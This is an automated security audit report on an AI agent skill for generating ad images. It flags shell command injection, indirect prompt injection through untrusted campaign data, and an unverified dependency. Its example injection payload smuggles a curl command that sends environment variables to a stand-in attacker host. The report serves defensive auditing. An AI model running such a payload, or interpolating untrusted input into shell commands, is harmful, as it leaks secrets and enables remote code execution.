generate-ad-images
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
- COMMAND_EXECUTION (HIGH): The instructions in
SKILL.md(Steps 4 and 6) direct the agent to run a shell command:python scripts/generate_image.py --prompt "[your prompt]". Because[your prompt]is constructed from user-controlled parameters likecreative_directionandtarget_audience, an attacker can provide inputs containing shell metacharacters (e.g.,"; curl attacker.com/leak?d=$(env) #) to execute arbitrary commands. - EXTERNAL_DOWNLOADS (MEDIUM): The
scripts/requirements.txtfile specifies theimagekitiopackage. This dependency does not originate from a trusted organization as defined in the [TRUST-SCOPE-RULE], making it an unverifiable third-party dependency. - REMOTE_CODE_EXECUTION (HIGH): Successful exploitation of the command injection vulnerability in the shell execution workflow allows for full remote code execution on the environment running the agent.
- PROMPT_INJECTION (HIGH): The skill is highly vulnerable to indirect prompt injection (Category 8) due to its core design of processing untrusted campaign data and using it to drive command-line tools.
- Ingestion points: Campaign parameters (
product_or_service,target_audience,creative_direction,kpi) ingested inSKILL.mdStep 1. - Boundary markers: None. User data is directly interpolated into prompts and shell arguments.
- Capability inventory: Execution of
scripts/generate_image.pywhich has full network access to Google Gemini and ImageKit APIs. - Sanitization: None. There is no logic to escape double quotes or shell-sensitive characters in the provided campaign data before processing.
Recommendations
- AI detected serious security threats
Audit Metadata